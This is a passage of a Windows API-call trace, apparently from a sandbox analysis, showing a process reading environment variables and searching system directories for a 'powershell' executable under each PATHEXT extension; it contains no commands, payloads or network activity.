	[0507.765] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0507.765] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.765] CoTaskMemFree (pv=0x1b91f4f0) 
	[0507.768] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0507.768] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.768] CoTaskMemFree (pv=0x1b91f4f0) 
	[0508.307] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0508.307] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.307] CoTaskMemFree (pv=0x1b91f4f0) 
	[0509.165] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0509.165] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0509.165] CoTaskMemFree (pv=0x1b91f4f0) 
	[0509.168] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0509.168] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0509.168] CoTaskMemFree (pv=0x1b91f4f0) 
	[0509.168] CoTaskMemAlloc (cb=0x128) returned 0x41ff50
	[0509.168] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x41ff50, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0509.169] CoTaskMemFree (pv=0x41ff50) 
	[0509.173] CoTaskMemAlloc (cb=0x20e) returned 0x1b91a5e0
	[0509.173] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b91a5e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0509.173] CoTaskMemFree (pv=0x1b91a5e0) 
	[0509.177] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0509.178] SetErrorMode (uMode=0x1) returned 0x1
	[0509.181] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0509.978] SetErrorMode (uMode=0x1) returned 0x1
	[0509.980] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0509.980] SetErrorMode (uMode=0x1) returned 0x1
	[0509.980] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0509.988] SetErrorMode (uMode=0x1) returned 0x1
	[0509.989] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0509.990] SetErrorMode (uMode=0x1) returned 0x1
	[0509.990] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0509.998] SetErrorMode (uMode=0x1) returned 0x1
	[0509.999] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0509.999] SetErrorMode (uMode=0x1) returned 0x1
	[0509.999] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0510.007] SetErrorMode (uMode=0x1) returned 0x1
	[0510.008] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0510.008] SetErrorMode (uMode=0x1) returned 0x1
	[0510.008] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0510.607] SetErrorMode (uMode=0x1) returned 0x1
	[0510.608] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0510.608] SetErrorMode (uMode=0x1) returned 0x1
	[0510.608] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0510.617] SetErrorMode (uMode=0x1) returned 0x1
	[0510.618] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0510.618] SetErrorMode (uMode=0x1) returned 0x1
	[0510.618] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0510.627] SetErrorMode (uMode=0x1) returned 0x1
	[0510.628] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0510.628] SetErrorMode (uMode=0x1) returned 0x1
	[0510.628] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0510.636] SetErrorMode (uMode=0x1) returned 0x1
	[0510.638] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0511.190] SetErrorMode (uMode=0x1) returned 0x1
	[0511.191] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.198] SetErrorMode (uMode=0x1) returned 0x1
	[0511.199] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0511.200] SetErrorMode (uMode=0x1) returned 0x1
	[0511.200] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.207] SetErrorMode (uMode=0x1) returned 0x1
	[0511.209] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0511.209] SetErrorMode (uMode=0x1) returned 0x1
	[0511.209] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.217] SetErrorMode (uMode=0x1) returned 0x1
	[0511.218] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0511.218] SetErrorMode (uMode=0x1) returned 0x1
	[0511.218] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.226] SetErrorMode (uMode=0x1) returned 0x1
	[0511.227] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0511.227] SetErrorMode (uMode=0x1) returned 0x1
	[0511.227] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.829] SetErrorMode (uMode=0x1) returned 0x1
	[0511.830] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0511.830] SetErrorMode (uMode=0x1) returned 0x1
	[0511.830] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.837] SetErrorMode (uMode=0x1) returned 0x1
	[0511.838] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0511.838] SetErrorMode (uMode=0x1) returned 0x1
	[0511.838] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.844] SetErrorMode (uMode=0x1) returned 0x1
	[0511.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0511.845] SetErrorMode (uMode=0x1) returned 0x1
	[0511.845] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.846] SetErrorMode (uMode=0x1) returned 0x1
	[0511.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0511.846] SetErrorMode (uMode=0x1) returned 0x1
	[0511.846] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.846] SetErrorMode (uMode=0x1) returned 0x1
	[0511.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0511.846] SetErrorMode (uMode=0x1) returned 0x1
	[0511.847] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.847] SetErrorMode (uMode=0x1) returned 0x1
	[0511.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0511.847] SetErrorMode (uMode=0x1) returned 0x1
	[0511.847] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.847] SetErrorMode (uMode=0x1) returned 0x1
	[0511.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0511.847] SetErrorMode (uMode=0x1) returned 0x1
	[0511.847] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.848] SetErrorMode (uMode=0x1) returned 0x1
	[0511.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0511.848] SetErrorMode (uMode=0x1) returned 0x1
	[0511.848] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.848] SetErrorMode (uMode=0x1) returned 0x1
	[0511.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0511.848] SetErrorMode (uMode=0x1) returned 0x1
	[0511.848] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.849] SetErrorMode (uMode=0x1) returned 0x1
	[0511.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0511.849] SetErrorMode (uMode=0x1) returned 0x1
	[0511.849] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.849] SetErrorMode (uMode=0x1) returned 0x1
	[0511.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0511.849] SetErrorMode (uMode=0x1) returned 0x1
	[0511.849] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.850] SetErrorMode (uMode=0x1) returned 0x1
	[0511.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0511.850] SetErrorMode (uMode=0x1) returned 0x1
	[0511.850] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.850] SetErrorMode (uMode=0x1) returned 0x1
	[0511.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0511.850] SetErrorMode (uMode=0x1) returned 0x1
